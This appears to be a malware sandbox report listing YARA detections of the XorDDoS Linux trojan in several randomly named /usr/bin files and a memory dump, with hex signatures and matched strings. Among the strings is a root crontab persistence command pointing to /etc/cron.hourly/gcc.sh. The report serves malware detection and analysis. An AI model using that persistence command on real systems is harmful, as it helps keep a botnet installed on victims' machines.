/usr/bin/wvbxepjyjx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wvbxepjyjx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wvbxepjyjx	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/wvbxepjyjx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wvbxepjyjx	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wvbxepjyjx	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wvbxepjyjx	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/sxruomujjd	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wvbxepjyjx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/sxruomujjd	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/sxruomujjd	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/sxruomujjd	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/sxruomujjd	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/sxruomujjd	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/sxruomujjd	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/sxruomujjd	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/buxftyvhwp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/buxftyvhwp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/buxftyvhwp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/buxftyvhwp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/buxftyvhwp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/buxftyvhwp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/buxftyvhwp	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/buxftyvhwp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/iulapzbfpq	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/iulapzbfpq	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/iulapzbfpq	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/iulapzbfpq	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/iulapzbfpq	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/iulapzbfpq	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/iulapzbfpq	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/iulapzbfpq	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/gnmftoxpza	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/gnmftoxpza	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/gnmftoxpza	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/gnmftoxpza	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/gnmftoxpza	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/gnmftoxpza	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/gnmftoxpza	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/gnmftoxpza	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/posifzmmhg	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/posifzmmhg	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/posifzmmhg	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/posifzmmhg	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/posifzmmhg	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/posifzmmhg	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/posifzmmhg	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/posifzmmhg	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/sotpizdssr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/sotpizdssr	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/sotpizdssr	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/sotpizdssr	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/sotpizdssr	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/sotpizdssr	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/sotpizdssr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/becqudbgme	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/sotpizdssr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/becqudbgme	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/becqudbgme	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/becqudbgme	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/becqudbgme	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/becqudbgme	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/becqudbgme	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/becqudbgme	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mizdkrdyqj	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mizdkrdyqj	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/mizdkrdyqj	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/mizdkrdyqj	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mizdkrdyqj	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/mizdkrdyqj	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/mizdkrdyqj	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0 0x6b214:$st0: BB2FA36AAA9541F0
/usr/bin/mizdkrdyqj	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 106 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
